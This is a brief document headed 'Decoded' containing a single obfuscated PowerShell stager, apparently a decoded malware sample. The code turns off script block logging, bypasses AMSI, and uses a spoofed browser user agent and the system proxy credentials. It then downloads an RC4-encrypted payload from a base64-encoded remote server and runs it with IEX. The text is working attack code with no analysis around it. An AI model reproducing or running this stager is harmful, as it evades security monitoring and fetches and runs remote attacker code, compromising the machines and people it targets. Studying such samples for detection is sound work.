Decoded

1. If($PSVerSiOnTablE.PSVERsion.MAjoR -Ge 3){$d3982=[ReF].ASsemBly.GETType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($D3982){$9E5ab=$D3982.GEtVAlUe($nUll);IF($9E5aB['ScriptB'+'lockLogging']){$9E5AB['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$9e5Ab['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[CoLleCTIons.GEneRiC.DiCtIoNArY[sTrINg,SyStEm.OBJECt]]::nEW();$vAL.ADd('EnableScriptB'+'lockLogging',0);$VAl.ADD('EnableScriptBlockInvocationLogging',0);$9E5Ab['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}Else{[ScrIPtBLOck]."GETFIe`lD"('signatures','N'+'onPublic,Static').SETValUE($null,(NEW-OBJeCT CoLLeCTiONS.GeNERIc.HAsHSeT[StrING]))}$ReF=[REf].AsseMbLy.GetTYPE('System.Management.Automation.AmsiUtils');$ReF.GEtFIeLD('amsiInitFailed','NonPublic,Static').SEtVAlUe($NUlL,$TRue);};[SYstEm.NEt.SERvicEPOinTMaNAGer]::EXPeCt100ContiNuE=0;$387a1=NEw-ObJEct SYsTEm.NeT.WebClieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$387a1.HeADers.AdD('User-Agent',$u);$387A1.HeADErS.ADD('User-Agent',$u);$387a1.PrOxY=[SYsTEM.NET.WEbREQueSt]::DeFAULtWebProxy;$387a1.PRoXy.CrEDENTIALs = [SysTeM.NEt.CreDeNtiALCAcHE]::DeFaultNETWOrkCREDentialS;$Script:Proxy = $387a1.Proxy;$K=[SYsTEM.TEXt.EncoDINg]::ASCII.GEtBYteS('m}qn[O:Cx?3Ail/cz1b8fp+w2gs{X]QL');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXOR$S[($S[$I]+$S[$H])%256]}};$ser=$([Text.EncodInG]::UnICodE.GETSTrING([COnverT]::FRoMBAsE64STRiNG('aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA')));$t='/news.php';$387A1.HeADERs.ADD("Cookie","qBnIpoUjeYArxXHp=UQXh4qqlRrfcwB8DIWdvt8ew3JA=");$DAta=$387a1.DOWnlOaDDaTA($ser+$T);$IV=$DaTA[0..3];$DaTA=$DaTa[4..$data.LengTh];-JOIN[ChAR[]](& $R $DATa ($IV+$K))|IEX